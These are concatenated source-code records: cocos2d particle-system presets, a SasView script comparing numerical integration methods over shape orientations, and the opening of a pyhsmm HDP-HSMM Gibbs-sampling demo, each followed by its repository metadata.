    end_color_var = Color(0.5, 0.5, 0.5, 0.0)
    size = 20.0                     # pixels
    size_var = 10.0
    blend_additive = True
    color_modulate = True
class Meteor( ParticleSystem ):
    """Meteor trail: slow spray dragged sideways/up by strong gravity."""

    duration = -1                   # -1: emit forever
    total_particles = 150

    # Emitter geometry and kinematics
    gravity = Point2(-200,100)      # pulls the trail left and upward
    angle = 90.0
    angle_var = 360.0               # radiate in every direction
    speed = 15.0
    speed_var = 5.0
    radial_accel = 0
    radial_accel_var = 0
    tangential_accel = 0.0
    tangential_accel_var = 0.0
    pos_var = Point2(0,0)

    # Particle lifetime
    life = 2.0
    life_var = 1.0
    emission_rate = total_particles / life

    # Appearance
    size = 60.0                     # pixels
    size_var = 10.0
    start_color = Color(0.2, 0.7, 0.7, 1.0)
    start_color_var = Color(0.0, 0.0, 0.0, 0.2)
    end_color = Color(0.0, 0.0, 0.0, 1.0)
    end_color_var = Color(0.0, 0.0, 0.0, 0.0)
    blend_additive = True
    color_modulate = True
class Galaxy( ParticleSystem ):
    """Rotating galaxy: inward radial pull balanced by tangential swirl."""

    duration = -1                   # -1: emit forever
    total_particles = 200

    # Emitter geometry and kinematics
    gravity = Point2(0,0)
    angle = 90.0
    angle_var = 360.0               # radiate in every direction
    speed = 60.0
    speed_var = 10.0
    radial_accel = -80.0            # attract toward the core
    radial_accel_var = 0
    tangential_accel = 80.0         # spin the disk
    tangential_accel_var = 0.0
    pos_var = Point2(0,0)

    # Particle lifetime
    life = 4.0
    life_var = 1.0
    emission_rate = total_particles / life

    # Appearance
    size = 37.0                     # pixels
    size_var = 10.0
    start_color = Color(0.12, 0.25, 0.76, 1.0)
    start_color_var = Color(0.0, 0.0, 0.0, 0.0)
    end_color = Color(0.0, 0.0, 0.0, 0.0)
    end_color_var = Color(0.0, 0.0, 0.0, 0.0)
    blend_additive = True
    color_modulate = True
class Smoke( ParticleSystem ):
    """Faint rising smoke column: few, large, mostly-transparent particles."""

    duration = -1                   # -1: emit forever
    total_particles = 80

    # Emitter geometry and kinematics
    gravity = Point2(0,0)
    angle = 90.0
    angle_var = 10.0                # narrow upward cone
    speed = 25.0
    speed_var = 10.0
    radial_accel = 5                # slight outward drift
    radial_accel_var = 0
    tangential_accel = 0.0
    tangential_accel_var = 0.0
    pos_var = Point2(0.1,0)

    # Particle lifetime
    life = 4.0
    life_var = 1.0
    emission_rate = total_particles / life

    # Appearance: constant grey, alpha stays low throughout
    size = 40.0                     # pixels
    size_var = 10.0
    start_color = Color(0.5,0.5,0.5,0.1)
    start_color_var = Color(0,0,0,0.1)
    end_color = Color(0.5,0.5,0.5,0.1)
    end_color_var = Color(0,0,0,0.1)
    blend_additive = True
    color_modulate = False
|
shadowmint/nwidget
|
lib/cocos2d-0.5.5/cocos/particle_systems.py
|
Python
|
apache-2.0
| 10,826
|
[
"Galaxy"
] |
a8e5776b55dbe81d5a125952111483122eb38ad877de6753934304b43848d994
|
#!/usr/bin/env python
"""
Asymmetric shape integration
Usage:
explore/asymint.py [MODEL] [q-value]
Computes the numerical integral over theta and phi of the given model at a
single point q using different algorithms or the same algorithm with different
precision. It also displays a 2-D image of the theta-phi surface that is
being integrated.
The available models are:
triaxial_ellipsoid, parallelpiped, paracrystal, cylinder, sphere
Cylinder and sphere are included as simple checks on the integration
algorithms. Cylinder is better investigated using 1-D integration methods in
explore/symint.py. Sphere has an easily computed analytic value which is
identical for all theta-phi for a given q, so it is useful for checking
that the normalization constants are correct for the different algorithms.
"""
from __future__ import print_function, division
import os, sys
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
import warnings
import numpy as np
import mpmath as mp
from numpy import pi, sin, cos, sqrt, exp, expm1, degrees, log10, arccos
from numpy.polynomial.legendre import leggauss
from scipy.integrate import dblquad, simps, romb, romberg
import pylab
import sasmodels.special as sp
DTYPE = 'd'
class MPenv:
    """Arbitrary-precision math environment backed by mpmath.

    Provides the same interface as NPenv so the model factories can be
    evaluated either in double precision or at full mpmath precision.
    """
    pi = mp.pi
    mpf = staticmethod(mp.mpf)
    sqrt = staticmethod(mp.sqrt)
    exp = staticmethod(mp.exp)
    expm1 = staticmethod(mp.expm1)
    cos = staticmethod(mp.cos)
    sin = staticmethod(mp.sin)
    tan = staticmethod(mp.tan)

    @staticmethod
    def sas_3j1x_x(x):
        # 3 j1(x)/x: spherical form-factor kernel
        return 3*(mp.sin(x)/x - mp.cos(x))/(x*x)

    @staticmethod
    def sas_2J1x_x(x):
        # 2 J1(x)/x: cylindrical cross-section kernel
        return 2*mp.j1(x)/x

    @staticmethod
    def sas_sinx_x(x):
        # sinc without the pi scaling
        return mp.sin(x)/x
class NPenv:
    """Double-precision math environment backed by numpy/sasmodels.

    Mirrors MPenv so the same factory code can run in either precision.
    """
    pi = np.pi
    # mpf here just coerces to a DTYPE array; #mpf = staticmethod(float)
    mpf = staticmethod(lambda x: np.array(x, DTYPE))
    sqrt = staticmethod(np.sqrt)
    exp = staticmethod(np.exp)
    expm1 = staticmethod(np.expm1)
    cos = staticmethod(np.cos)
    sin = staticmethod(np.sin)
    tan = staticmethod(np.tan)
    sas_3j1x_x = staticmethod(sp.sas_3j1x_x)
    sas_2J1x_x = staticmethod(sp.sas_2J1x_x)
    sas_sinx_x = staticmethod(sp.sas_sinx_x)
# Scattering length densities shared by all shape factories; only the
# squared CONTRAST enters the normalization constants.
SLD = 3
SLD_SOLVENT = 6
CONTRAST = SLD - SLD_SOLVENT  # negative (-3), but it is always squared
# Carefully code models so that mpmath will use full precision. That means:
# * wrap inputs in env.mpf
# * don't use floating point constants, only integers
# * for division, make sure the numerator or denominator is env.mpf
# * use env.pi, env.sas_sinx_x, etc. for functions
def make_parallelepiped(a, b, c, env=NPenv):
    """Return (norm, Fq) for a rectangular parallelepiped with edges a, b, c."""
    a, b, c = env.mpf(a), env.mpf(b), env.mpf(c)
    def Fq(qa, qb, qc):
        # One sinc factor per axis.
        return (env.sas_sinx_x(a*qa/2)
                * env.sas_sinx_x(b*qb/2)
                * env.sas_sinx_x(c*qc/2))
    Fq.__doc__ = "parallelepiped a=%g, b=%g c=%g"%(a, b, c)
    volume = a*b*c
    norm = CONTRAST**2*volume/10000
    return norm, Fq
def make_core_shell_parallelepiped(a, b, c, da, db, dc, slda, sldb, sldc, env=NPenv):
    """Return (norm, Fq) for a core-shell parallelepiped.

    Core edges are a, b, c; face-shell thicknesses are da, db, dc with
    scattering length densities slda, sldb, sldc.  The ``overlapping``
    switch selects between two conventions for how the shell slabs meet
    at the edges.
    """
    overlapping = False
    a, b, c = env.mpf(a), env.mpf(b), env.mpf(c)
    da, db, dc = env.mpf(da), env.mpf(db), env.mpf(dc)
    slda, sldb, sldc = env.mpf(slda), env.mpf(sldb), env.mpf(sldc)
    # Contrasts: core vs solvent, and each shell vs solvent.
    dr0 = CONTRAST
    drA, drB, drC = slda-SLD_SOLVENT, sldb-SLD_SOLVENT, sldc-SLD_SOLVENT
    # Total (core + both shells) extents along each axis.
    tA, tB, tC = a + 2*da, b + 2*db, c + 2*dc
    def Fq(qa, qb, qc):
        # Length-weighted sinc amplitudes for core (si*) and total (si*t).
        siA = a*env.sas_sinx_x(a*qa/2)
        siB = b*env.sas_sinx_x(b*qb/2)
        siC = c*env.sas_sinx_x(c*qc/2)
        siAt = tA*env.sas_sinx_x(tA*qa/2)
        siBt = tB*env.sas_sinx_x(tB*qb/2)
        siCt = tC*env.sas_sinx_x(tC*qc/2)
        if overlapping:
            return (dr0*siA*siB*siC
                    + drA*(siAt-siA)*siB*siC
                    + drB*siAt*(siBt-siB)*siC
                    + drC*siAt*siBt*(siCt-siC))
        else:
            return (dr0*siA*siB*siC
                    + drA*(siAt-siA)*siB*siC
                    + drB*siA*(siBt-siB)*siC
                    + drC*siA*siB*(siCt-siC))
    Fq.__doc__ = "core-shell parallelepiped a=%g, b=%g c=%g"%(a, b, c)
    if overlapping:
        volume = a*b*c + 2*da*b*c + 2*tA*db*c + 2*tA*tB*dc
    else:
        volume = a*b*c + 2*da*b*c + 2*a*db*c + 2*a*b*dc
    # NOTE(review): unlike the other factories this norm omits CONTRAST**2
    # (the contrasts are folded into Fq itself) — presumably intentional.
    norm = 1/(volume*10000)
    return norm, Fq
def make_triaxial_ellipsoid(a, b, c, env=NPenv):
    """Return (norm, Fq) for a triaxial ellipsoid with semi-axes a, b, c."""
    a, b, c = env.mpf(a), env.mpf(b), env.mpf(c)
    def Fq(qa, qb, qc):
        # Effective qr for the sphere kernel along the scaled axes.
        effective_qr = env.sqrt((a*qa)**2 + (b*qb)**2 + (c*qc)**2)
        return env.sas_3j1x_x(effective_qr)
    Fq.__doc__ = "triaxial ellipsoid minor=%g, major=%g polar=%g"%(a, b, c)
    volume = 4*env.pi*a*b*c/3
    norm = CONTRAST**2*volume/10000
    return norm, Fq
def make_cylinder(radius, length, env=NPenv):
    """Return (norm, Fq) for a right circular cylinder."""
    radius, length = env.mpf(radius), env.mpf(length)
    def Fq(qa, qb, qc):
        # Cross-section factor in the ab-plane times the axial sinc.
        q_perp = env.sqrt(qa**2 + qb**2)
        return env.sas_2J1x_x(q_perp*radius) * env.sas_sinx_x((qc*length)/2)
    Fq.__doc__ = "cylinder radius=%g, length=%g"%(radius, length)
    volume = env.pi*radius**2*length
    norm = CONTRAST**2*volume/10000
    return norm, Fq
def make_sphere(radius, env=NPenv):
    """Return (norm, Fq) for a sphere of the given *radius*.

    Included as a sanity check: the orientation integral is analytic,
    so every integrator should reproduce the same normalized value.
    """
    radius = env.mpf(radius)
    def Fq(qa, qb, qc):
        q = env.sqrt(qa**2 + qb**2 + qc**2)
        return env.sas_3j1x_x(q*radius)
    Fq.__doc__ = "sphere radius=%g"%(radius, )
    # Bug fix: the sphere volume is (4/3) pi r**3 — the /3 was missing —
    # and env.pi is used instead of the module-level double-precision pi
    # so the mpmath environment keeps full precision (see the precision
    # rules documented above the factory functions).
    volume = 4*env.pi*radius**3/3
    norm = CONTRAST**2*volume/10000
    return norm, Fq
def make_paracrystal(radius, dnn, d_factor, lattice='bcc', env=NPenv):
    """Return (norm, Fq) for a paracrystal of spheres on a cubic lattice.

    *dnn* is the nearest-neighbour distance and *d_factor* the lattice
    distortion; *lattice* is one of 'sc', 'bcc', 'fcc'.  The returned Fq
    folds sqrt(S(q)) into the sphere amplitude because the caller squares
    the result.
    """
    # Fix: this conversion was duplicated (it appeared again after the
    # lattice_fn lookup); convert once.
    radius, dnn, d_factor = env.mpf(radius), env.mpf(dnn), env.mpf(d_factor)
    # Reciprocal-lattice transforms for each cubic lattice type.
    def sc(qa, qb, qc):
        return qa, qb, qc
    def bcc(qa, qb, qc):
        a1 = (+qa + qb + qc)/2
        a2 = (-qa - qb + qc)/2
        a3 = (-qa + qb - qc)/2
        return a1, a2, a3
    def fcc(qa, qb, qc):
        a1 = ( 0 + qb + qc)/2
        a2 = (-qa + 0 + qc)/2
        a3 = (-qa + qb + 0)/2
        return a1, a2, a3
    lattice_fn = {'sc': sc, 'bcc': bcc, 'fcc': fcc}[lattice]
    def Fq(qa, qb, qc):
        a1, a2, a3 = lattice_fn(qa, qb, qc)
        # Note: paper says that different directions can have different
        # distortion factors. Easy enough to add to the code.
        arg = -(dnn*d_factor)**2*(a1**2 + a2**2 + a3**2)/2
        exp_arg = env.exp(arg)
        den = [((exp_arg - 2*env.cos(dnn*a))*exp_arg + 1) for a in (a1, a2, a3)]
        Sq = -env.expm1(2*arg)**3/(den[0]*den[1]*den[2])
        q = env.sqrt(qa**2 + qb**2 + qc**2)
        Fq = env.sas_3j1x_x(q*radius)
        # the caller computes F(q)**2, but we need it to compute S(q)*F(q)**2
        return env.sqrt(Sq)*Fq
    Fq.__doc__ = "%s paracrystal a=%g da=%g r=%g"%(lattice, dnn, d_factor, radius)
    def sphere_volume(r): return 4*env.pi*r**3/3
    # Packing fraction for each lattice.
    Vf = {
        'sc': sphere_volume(radius/dnn),
        'bcc': 2*sphere_volume(env.sqrt(3)/2*radius/dnn),
        'fcc': 4*sphere_volume(1/env.sqrt(2)*radius/dnn),
    }[lattice]
    volume = sphere_volume(radius)
    norm = CONTRAST**2*volume/10000*Vf
    return norm, Fq
# Global kernel state; build_shape() assigns these via ``global``.
NORM = 1.0  # type: float
KERNEL = None  # type: CALLABLE[[ndarray, ndarray, ndarray], ndarray]
NORM_MP = 1  # type: mpf
# Bug fix: this placeholder was assigned to KERNEL a second time; the mpf
# type comment and build_shape's ``global KERNEL_MP`` show it was meant to
# declare the mpmath kernel slot.
KERNEL_MP = None  # type: CALLABLE[[mpf, mpf, mpf], mpf]

# Shape names accepted by build_shape() and the command line.
SHAPES = [
    'sphere',
    'cylinder',
    'triaxial_ellipsoid',
    'parallelepiped',
    'core_shell_parallelepiped',
    'fcc_paracrystal',
    'bcc_paracrystal',
    'sc_paracrystal',
]
def build_shape(shape, **pars):
    """Build double- and full-precision kernels for *shape*.

    Stores the results in the module globals NORM/KERNEL (numpy) and
    NORM_MP/KERNEL_MP (mpmath).  *pars* may override the default
    dimensions; values may be strings, which mpmath parses at full
    precision.  Raises ValueError for an unknown shape name.
    """
    global NORM, KERNEL
    global NORM_MP, KERNEL_MP
    # Note: using integer or string defaults for the sake of mpf
    if shape == 'sphere':
        RADIUS = pars.get('radius', 50)
        NORM, KERNEL = make_sphere(radius=RADIUS)
        NORM_MP, KERNEL_MP = make_sphere(radius=RADIUS, env=MPenv)
    elif shape == 'cylinder':
        #RADIUS, LENGTH = 10, 100000
        RADIUS = pars.get('radius', 10)
        # Bug fix: this looked up the 'radius' key, so a length=... given
        # on the command line was silently ignored.
        LENGTH = pars.get('length', 300)
        NORM, KERNEL = make_cylinder(radius=RADIUS, length=LENGTH)
        NORM_MP, KERNEL_MP = make_cylinder(radius=RADIUS, length=LENGTH, env=MPenv)
    elif shape == 'triaxial_ellipsoid':
        #A, B, C = 4450, 14000, 47
        A = pars.get('a', 445)
        B = pars.get('b', 140)
        C = pars.get('c', 47)
        NORM, KERNEL = make_triaxial_ellipsoid(A, B, C)
        NORM_MP, KERNEL_MP = make_triaxial_ellipsoid(A, B, C, env=MPenv)
    elif shape == 'parallelepiped':
        #A, B, C = 4450, 14000, 47
        A = pars.get('a', 445)
        B = pars.get('b', 140)
        C = pars.get('c', 47)
        NORM, KERNEL = make_parallelepiped(A, B, C)
        NORM_MP, KERNEL_MP = make_parallelepiped(A, B, C, env=MPenv)
    elif shape == 'core_shell_parallelepiped':
        #A, B, C = 4450, 14000, 47
        #A, B, C = 445, 140, 47  # integer for the sake of mpf
        A = pars.get('a', 114)
        B = pars.get('b', 1380)
        C = pars.get('c', 6800)
        DA = pars.get('da', 21)
        DB = pars.get('db', 58)
        DC = pars.get('dc', 2300)
        SLDA = pars.get('slda', "5")
        SLDB = pars.get('sldb', "-0.3")
        SLDC = pars.get('sldc', "11.5")
        ## default parameters from sasmodels
        #A,B,C,DA,DB,DC,SLDA,SLDB,SLDC = 400,75,35,10,10,10,2,4,2
        ## swap A-B-C to C-B-A
        #A, B, C, DA, DB, DC, SLDA, SLDB, SLDC = C, B, A, DC, DB, DA, SLDC, SLDB, SLDA
        #A,B,C,DA,DB,DC,SLDA,SLDB,SLDC = 10,20,30,100,200,300,1,2,3
        #SLD_SOLVENT,CONTRAST = 0, 4
        if 1: # C shortest
            B, C = C, B
            DB, DC = DC, DB
            SLDB, SLDC = SLDC, SLDB
        elif 0: # C longest
            A, C = C, A
            DA, DC = DC, DA
            SLDA, SLDC = SLDC, SLDA
        #NORM, KERNEL = make_core_shell_parallelepiped(A, B, C, DA, DB, DC, SLDA, SLDB, SLDC)
        NORM, KERNEL = make_core_shell_parallelepiped(A, B, C, DA, DB, DC, SLDA, SLDB, SLDC)
        NORM_MP, KERNEL_MP = make_core_shell_parallelepiped(A, B, C, DA, DB, DC, SLDA, SLDB, SLDC, env=MPenv)
    elif shape.endswith('paracrystal'):
        LATTICE, _ = shape.split('_')
        DNN = pars.get('dnn', 220)
        D_FACTOR = pars.get('d_factor', '0.06')
        RADIUS = pars.get('radius', 40)
        NORM, KERNEL = make_paracrystal(
            radius=RADIUS, dnn=DNN, d_factor=D_FACTOR, lattice=LATTICE)
        NORM_MP, KERNEL_MP = make_paracrystal(
            radius=RADIUS, dnn=DNN, d_factor=D_FACTOR, lattice=LATTICE, env=MPenv)
    else:
        raise ValueError("Unknown shape %r"%shape)
# Note: hardcoded in mp_quad
# Full spherical integration domain for (theta, phi).
THETA_LOW, THETA_HIGH = 0, pi
PHI_LOW, PHI_HIGH = 0, 2*pi
SCALE = 1  # overall multiplier applied by the integrators
# mathematica code for triaxial_ellipsoid (untested)
_ = """
R[theta_, phi_, a_, b_, c_] := Sqrt[(a Sin[theta]Cos[phi])^2 + (b Sin[theta]Sin[phi])^2 + (c Cos[theta])^2]
Sphere[q_, r_] := 3 SphericalBesselJ[q r]/(q r)
V[a_, b_, c_] := 4/3 pi a b c
Norm[sld_, solvent_, a_, b_, c_] := V[a, b, c] (solvent - sld)^2
F[q_, theta_, phi_, a_, b_, c_] := Sphere[q, R[theta, phi, a, b, c]]
I[q_, sld_, solvent_, a_, b_, c_] := Norm[sld, solvent, a, b, c]/(4 pi) Integrate[F[q, theta, phi, a, b, c]^2 Sin[theta], {phi, 0, 2 pi}, {theta, 0, pi}]
I[6/10^3, 63/10, 3, 445, 140, 47]
"""
# 2D integration functions
def mp_quad_2d(q):
    """Full-precision adaptive quadrature over the sphere using mpmath.

    Returns (evaluation count, normalized intensity).
    """
    n_evals = [0]
    def integrand(theta, phi):
        n_evals[0] += 1
        sin_theta = mp.sin(theta)
        qa = q*sin_theta*mp.cos(phi)
        qb = q*sin_theta*mp.sin(phi)
        qc = q*mp.cos(theta)
        # |F|^2 times the spherical Jacobian sin(theta)
        return KERNEL_MP(qa, qb, qc)**2 * sin_theta
    total = mp.quad(integrand, (0, mp.pi), (0, 2*mp.pi))
    return n_evals[0], NORM_MP*total/(4*mp.pi)
def kernel_2d(q, theta, phi):
    """
    S(q) kernel for paracrystal forms.

    Converts spherical (q, theta, phi) to Cartesian components and
    returns NORM * |F|^2 for the currently built shape.
    """
    q_ab = q*sin(theta)
    q_c = q*cos(theta)
    return NORM*KERNEL(q_ab*cos(phi), q_ab*sin(phi), q_c)**2
def scipy_dblquad_2d(q):
    """
    Integrate with scipy.integrate.dblquad.  Converges to the right
    answer, but slowly.  Returns (evaluation count, intensity).
    """
    n_evals = [0]
    def weighted_kernel(phi, theta):
        n_evals[0] += 1
        return kernel_2d(q, theta=theta, phi=phi)*sin(theta)
    total, _err = dblquad(weighted_kernel, THETA_LOW, THETA_HIGH,
                          lambda x: PHI_LOW, lambda x: PHI_HIGH)
    return n_evals[0], total*SCALE/(4*pi)
def scipy_romberg_2d(q):
    """
    Nested 1-D Romberg integration: phi inside, theta outside.  Does not
    complete in a reasonable time; accuracy unknown.
    """
    n_evals = [0]
    def inner(phi, theta):
        n_evals[0] += 1
        return kernel_2d(q, theta=theta, phi=phi)
    def outer(theta):
        return sin(theta)*romberg(
            inner, PHI_LOW, PHI_HIGH, divmax=100, args=(theta,))
    total = romberg(outer, THETA_LOW, THETA_HIGH, divmax=100)
    return n_evals[0], total*SCALE/(4*pi)
def semi_romberg_2d(q, n=100):
    """
    Hybrid rule: 1-D Romberg in phi, Simpson's rule over *n* theta points.
    """
    n_evals = [0]
    def inner(phi, theta):
        n_evals[0] += 1
        return kernel_2d(q, theta=theta, phi=phi)
    theta = np.linspace(THETA_LOW, THETA_HIGH, n)
    phi_integrals = [romberg(inner, PHI_LOW, PHI_HIGH, divmax=100, args=(t,))
                     for t in theta]
    total = simps(np.array(phi_integrals)*sin(theta), dx=theta[1]-theta[0])
    return n_evals[0], total*SCALE/(4*pi)
def gauss_quad_2d(q, n=150):
    """
    Gauss-Legendre product quadrature on the (theta, phi) rectangle
    (n = 20, 76 or 150 match the tabulated sasmodels rules).
    """
    z, w = leggauss(n)
    # Map nodes from [-1, 1] onto each integration interval.
    theta = (THETA_HIGH-THETA_LOW)*(z + 1)/2 + THETA_LOW
    phi = (PHI_HIGH-PHI_LOW)*(z + 1)/2 + PHI_LOW
    Atheta, Aphi = np.meshgrid(theta, phi)
    Aw = w[None, :] * w[:, None]
    sin_theta = abs(sin(Atheta))
    Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
    # Jacobian of the [-1,1]^2 -> [0,pi]x[0,2pi] change of variables.
    dxdy_stretch = (THETA_HIGH-THETA_LOW)/2 * (PHI_HIGH-PHI_LOW)/2
    Iq = np.sum(Zq*Aw*sin_theta)*SCALE/(4*pi) * dxdy_stretch
    return n**2, Iq
def gauss_quad_usub(q, n=150, dtype=DTYPE):
    """
    Gauss-Legendre quadrature with a change of variables that samples
    cos(theta) uniformly, restricted to a single quadrant.  Only valid
    for shapes mirror-symmetric about the AB, AC and BC planes — not for
    fcc/bcc paracrystals, which need the full 4 pi surface.
    """
    z, w = leggauss(n)
    # cos(theta) on (0, 1]; phi on [0, pi/2] (one quadrant).
    theta = arccos(0.5 * (z + 1))
    phi = pi/2*(0.5 * (z + 1))
    Atheta, Aphi = np.meshgrid(theta, phi)
    Aw = w[None, :] * w[:, None]
    q, Atheta, Aphi, Aw = [np.asarray(v, dtype=dtype) for v in (q, Atheta, Aphi, Aw)]
    Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
    return n**2, np.sum(Zq*Aw)*0.25
def gridded_2d(q, n=300):
    """
    Integrate on a regular n x n grid, printing rectangle, trapezoid,
    Simpson and Romberg results.  Romberg requires n = 2**k + 1.
    """
    theta = np.linspace(THETA_LOW, THETA_HIGH, n)
    phi = np.linspace(PHI_LOW, PHI_HIGH, n)
    Atheta, Aphi = np.meshgrid(theta, phi)
    Zq = kernel_2d(q=q, theta=Atheta, phi=Aphi)
    Zq *= abs(sin(Atheta))  # fold in the spherical Jacobian
    dx, dy = theta[1]-theta[0], phi[1]-phi[0]
    print("rect-%d"%n, n**2, np.sum(Zq)*dx*dy*SCALE/(4*pi))
    print("trapz-%d"%n, n**2, np.trapz(np.trapz(Zq, dx=dx), dx=dy)*SCALE/(4*pi))
    print("simpson-%d"%n, n**2, simps(simps(Zq, dx=dx), dx=dy)*SCALE/(4*pi))
    print("romb-%d"%n, n**2, romb(romb(Zq, dx=dx), dx=dy)*SCALE/(4*pi))
def quadpy_method(q, rule):
    """
    Integrate using a quadpy spherical rule given as *rule*="name:index".
    Available rule names and the corresponding indices::
        AlbrechtCollatz: [1-5]
        BazantOh: 9, 11, 13
        HeoXu: 13, 15, 17, 19-[1-2], 21-[1-6], 23-[1-3], 25-[1-2], 27-[1-3],
            29, 31, 33, 35, 37, 39-[1-2]
        FliegeMaier: 4, 9, 16, 25
        Lebedev: 3[a-c], 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 35,
            41, 47, 53, 59, 65, 71, 77 83, 89, 95, 101, 107, 113, 119, 125, 131
        McLaren: [1-10]
        Stroud: U3 3-1, U3 5-[1-5], U3 7-[1-2], U3 8-1, U3 9-[1-3],
            U3 11-[1-3], U3 14-1
    """
    try:
        import quadpy
    except ImportError:
        warnings.warn("use 'pip install quadpy' to enable quadpy.sphere tests")
        return
    from quadpy.sphere import (AlbrechtCollatz, BazantOh, HeoXu,
        FliegeMaier, Lebedev, McLaren, Stroud, integrate_spherical)
    rule_classes = {
        'AlbrechtCollatz': AlbrechtCollatz,
        'BazantOh': BazantOh,
        'HeoXu': HeoXu,
        'FliegeMaier': FliegeMaier,
        'Lebedev': Lebedev,
        'McLaren': McLaren,
        'Stroud': Stroud,
    }
    rule_name, rule_index = rule.split(':')
    # These two families index their rules by integer; the rest by string.
    if rule_name in ('AlbrechtCollatz', 'McLaren'):
        index = int(rule_index)
    else:
        index = rule_index
    rule_obj = rule_classes[rule_name](index)
    integrand = lambda azimuthal, polar: kernel_2d(q=q, theta=polar, phi=azimuthal)
    Iq = integrate_spherical(integrand, rule=rule_obj)/(4*pi)
    print("%s degree=%d points=%s => %.15g"
          % (rule, rule_obj.degree, len(rule_obj.points), Iq))
def plot_2d(q, n=300):
    """
    Plot the theta-phi integrand surface (log10 scale) on an n x n grid
    for the current shape at momentum transfer *q*.
    """
    theta = np.linspace(THETA_LOW, THETA_HIGH, n)
    phi = np.linspace(PHI_LOW, PHI_HIGH, n)
    Atheta, Aphi = np.meshgrid(theta, phi)
    surface = kernel_2d(q=q, theta=Atheta, phi=Aphi)
    #surface *= abs(sin(Atheta))
    # Clamp before log10 so zeros don't blow up the color scale.
    pylab.pcolor(degrees(theta), degrees(phi), log10(np.fmax(surface, 1.e-6)))
    pylab.axis('tight')
    pylab.title("%s I(q,t) sin(t) for q=%g" % (KERNEL.__doc__, q))
    pylab.xlabel("theta (degrees)")
    pylab.ylabel("phi (degrees)")
    colorbar = pylab.colorbar()
    colorbar.set_label('log10 S(q)')
    pylab.show()
def main():
    """Parse the command line, build the shape, and run every integrator."""
    import argparse
    parser = argparse.ArgumentParser(
        description="asymmetric integration explorer",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        )
    parser.add_argument('-s', '--shape', choices=SHAPES,
                        default='parallelepiped',
                        help='oriented shape')
    parser.add_argument('-q', '--q_value', type=str, default='0.005',
                        help='Q value to evaluate')
    parser.add_argument('pars', type=str, nargs='*', default=[],
                        help='p=val for p in shape parameters')
    opts = parser.parse_args()
    pars = {k: v for par in opts.pars for k, v in [par.split('=')]}
    build_shape(opts.shape, **pars)

    Q = float(opts.q_value)
    if opts.shape == 'sphere':
        # Bug fix: this used the undefined name RADIUS (it is local to
        # build_shape), raising NameError; recover the radius from the
        # parsed parameters using the same default as build_shape.
        radius = float(pars.get('radius', 50))
        print("exact", NORM*sp.sas_3j1x_x(Q*radius)**2)

    # Methods from quadpy, if quadpy is available
    #  AlbrechtCollatz: [1-5]
    #  BazantOh: 9, 11, 13
    #  HeoXu: 13, 15, 17, 19-[1-2], 21-[1-6], 23-[1-3], 25-[1-2], 27-[1-3],
    #     29, 31, 33, 35, 37, 39-[1-2]
    #  FliegeMaier: 4, 9, 16, 25
    #  Lebedev: 3[a-c], 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 35,
    #     41, 47, 53, 59, 65, 71, 77 83, 89, 95, 101, 107, 113, 119, 125, 131
    #  McLaren: [1-10]
    #  Stroud: U3 3-1, U3 5-[1-5], U3 7-[1-2], U3 8-1, U3 9-[1-3],
    #     U3 11-[1-3], U3 14-1
    quadpy_method(Q, "AlbrechtCollatz:5")
    quadpy_method(Q, "HeoXu:39-2")
    quadpy_method(Q, "FliegeMaier:25")
    quadpy_method(Q, "Lebedev:19")
    quadpy_method(Q, "Lebedev:131")
    quadpy_method(Q, "McLaren:10")
    quadpy_method(Q, "Stroud:U3 14-1")

    print("gauss-20 points=%d => %.15g" % gauss_quad_2d(Q, n=20))
    print("gauss-76 points=%d => %.15g" % gauss_quad_2d(Q, n=76))
    print("gauss-150 points=%d => %.15g" % gauss_quad_2d(Q, n=150))
    print("gauss-500 points=%d => %.15g" % gauss_quad_2d(Q, n=500))
    print("gauss-1025 points=%d => %.15g" % gauss_quad_2d(Q, n=1025))
    print("gauss-2049 points=%d => %.15g" % gauss_quad_2d(Q, n=2049))
    print("gauss-20 usub points=%d => %.15g" % gauss_quad_usub(Q, n=20))
    print("gauss-76 usub points=%d => %.15g" % gauss_quad_usub(Q, n=76))
    print("gauss-150 usub points=%d => %.15g" % gauss_quad_usub(Q, n=150))
    #gridded_2d(Q, n=2**8+1)
    gridded_2d(Q, n=2**10+1)
    #gridded_2d(Q, n=2**12+1)
    #gridded_2d(Q, n=2**15+1)
    # adaptive forms on models for which the calculations are fast enough
    SLOW_SHAPES = {
        'fcc_paracrystal', 'bcc_paracrystal', 'sc_paracrystal',
        'core_shell_parallelepiped',
    }
    if opts.shape not in SLOW_SHAPES:
        print("dblquad", *scipy_dblquad_2d(Q))
        print("semi-romberg-100", *semi_romberg_2d(Q, n=100))
        print("romberg", *scipy_romberg_2d(Q))
        with mp.workprec(100):
            print("mpmath", *mp_quad_2d(mp.mpf(opts.q_value)))
    plot_2d(Q, n=200)
# Command-line entry point.
if __name__ == "__main__":
    main()
|
SasView/sasmodels
|
explore/asymint.py
|
Python
|
bsd-3-clause
| 20,630
|
[
"Gaussian"
] |
1f47a4551fb720f8dd1022c62aad8879cca70c5c5f24fe2b579746c58612bb6c
|
"""HDP-HSMM demo: fit a weak-limit HDP-HSMM to example data by Gibbs
sampling and plot snapshots of the posterior every 10 iterations."""
from __future__ import division
import numpy as np
np.seterr(divide='ignore') # these warnings are usually harmless for this code
from matplotlib import pyplot as plt
import copy, os

import pyhsmm
from pyhsmm.util.text import progprint_xrange

SAVE_FIGURES = False

# Bug fix / compatibility: the original used the Python 2 print statement,
# a syntax error under Python 3; the function-call form behaves identically
# on both interpreters.
print('''
This demo shows the HDP-HSMM in action. Its iterations are slower than those for
the (Sticky-)HDP-HMM, but explicit duration modeling can be a big advantage for
conditioning the prior or for discovering structure in data.
''')

###############
#  load data  #
###############

T = 1000
data = np.loadtxt(os.path.join(os.path.dirname(__file__),'example-data.txt'))[:T]

#########################
#  posterior inference  #
#########################

# Set the weak limit truncation level
Nmax = 25

# and some hyperparameters
obs_dim = data.shape[1]
obs_hypparams = {'mu_0':np.zeros(obs_dim),
                'sigma_0':np.eye(obs_dim),
                'kappa_0':0.25,
                'nu_0':obs_dim+2}
dur_hypparams = {'alpha_0':2*30,
                 'beta_0':2}

obs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]
dur_distns = [pyhsmm.distributions.PoissonDuration(**dur_hypparams) for state in range(Nmax)]

